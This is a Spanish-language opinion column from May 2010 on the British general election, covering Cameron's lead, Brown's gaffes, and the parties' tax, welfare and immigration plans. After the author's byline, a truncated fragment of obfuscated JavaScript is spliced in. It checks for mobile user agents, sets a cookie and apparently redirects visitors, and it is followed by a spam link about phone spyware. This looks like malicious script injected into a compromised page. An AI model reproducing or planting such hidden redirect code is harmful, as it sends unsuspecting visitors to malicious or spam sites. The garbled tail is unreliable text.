• Noticias maquetadas 03.05.2010

    Crisis económica y elecciones británicas

    Montserrat Guibernau

    David Cameron se consolida como potencial vencedor tras el último debate, cuerpo a cuerpo y en directo, emitido por la BBC entre los candidatos a gobernar el Reino Unido. Cuando quedan pocos días para las elecciones – 6 de mayo-,los conservadores reafirman su liderazgo en intención de voto. Nick Clegg, líder demócrata-liberal, se mantiene en segundo lugar y Gordon Brown – entre meteduras de pata y las dosis de desgaste que emanan de un laborismo que gobierna el país desde 1997-parece hundirse sin remedio.

    Los laboristas están plenamente convencidos de la necesidad de relevar a Brown. Pero su gran problema es la ausencia de un candidato alternativo. Algunos ya han comenzado a distanciarse de él, sobre todo después del incidente en que un Brown amable y en plena campana electoral conversaba con una jubilada – votante laborista de toda la vida-que le expresaba su preocupación por el elevado incremento en el número de inmigrantes procedentes de Europa del Este asentados en su ciudad. Todo iba bien hasta que las palabras de Brown – una vez en su coche-fueron captadas por un micrófono aún activo en su solapa; Brown comentaba que la señora en cuestión era una «intolerante». Yes que las planchas y patinazos le han acompañado como una especie de maldición desde que logró hacer dimitir a Blair y ser nombrado – que no votado-primer ministro.

    Brown ya desaprovechó una oportunidad de oro al no convocar elecciones anticipadas durante el primer año de su mandato, en un momento en que logró situarse a la cabeza en intención de voto. Tony Blair fue quien lideró y ganó las elecciones que han permitido a Brown realizar su sueño de ser primer ministro. En estos momentos aunque el Partido Laborista, debido al complicado sistema electoral británico, consiguiera formar un gobierno de coalición, es muy probable que el relevo de Brown sea inevitable. Los primeros en proponerlo serían los propios laboristas.

    Según las encuestas, los temas que más preocupan al electorado son la crisis económica, la sanidad y la inmigración. La crisis económica domina el debate entre partidos, todos reacios a plantear cifras sobre la subida de impuestos necesaria y de la intensidad del recorte presupuestario indispensable para reducir la deuda pública.

    Cameron se ha comprometido a proteger la sanidad y la educación. Propone eliminar los impuestos de sucesión en patrimonios de hasta un millón de libras esterlinas. Promete mantener las ayudas económicas para calefacción a los jubilados y las ayudas por hijo a familias que ganen menos de 50.000 libras esterlinas al año.

    Los liberaldemócratas proyectan prescindir de las ayudas a la familia, pero sugieren eliminar el IRPF a quienes ganen hasta 10.000 libras esterlinas al año y rebajar impuestos a quienes ganen menos de 20.000 libras anuales mientras proyectan incrementarlos a la clase media y alta.

    Los laboristas son los únicos que defienden la necesidad de incrementar la inversión en servicios públicos como la sanidad y la educación, aunque esto no significa que renuncien a recortar drásticamente algunos presupuestos.

    Mientras Clegg sugiere limitar las prestaciones sociales por desempleo, Brown y Cameron insisten en la urgencia de crear incentivos que impulsen a aceptar un trabajo en lugar de elegir vivir a cuesta de prestaciones sociales y sin trabajar – práctica notablemente extendida y contra la cual los laboristas ya han tomado medidas desde el Gobierno-.En el último debate, los tres líderes se manifestaron a favor de regular la banca y Cameron expresó su voluntad específica de promover la creación de puestos de trabajo apoyando a la pequeña y mediana empresa.

    Tanto conservadores como laboristas abogan por un mayor control de la inmigración que incluya cerrar la puerta a inmigrantes no cualificados. Los liberaldemócratas sugieren una amnistía para inmigrantes ilegales que lleven diez años en el país, hablen inglés y quieran pasar los tests de ciudadanía. Tanto Brown como Cameron se oponen a tal iniciativa.

    Pero lo que realmente preocupa a los británicos son las declaraciones del Instituto Nacional para la Investigación Económica y Social afirmando que, para reducir la deuda pública al 3%, el Reino Unido necesita recortar su presupuesto anual en 30 millones de libras y incrementar los impuestos (IRPF) en 6 peniques por libra en diez años. El gobernador del Banco de Inglaterra, Merving King, afirma que las medidas necesarias para reducir la deuda pública serán tan drásticas que el partido que resulte elegido en estas elecciones no será reelegido en una generación.

    M. GUIBERNAU, catedrática de Política, Queen Mary University of London

    |ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://concordmarina.wpengine.com/android-spy-iphone-spyware-how-to-spy-on-text-for-free/

  • Comments are closed.

Calendario de artículos

mayo 2010
L M X J V S D
 12
3456789
10111213141516
17181920212223
24252627282930
31  

Artículos anteriores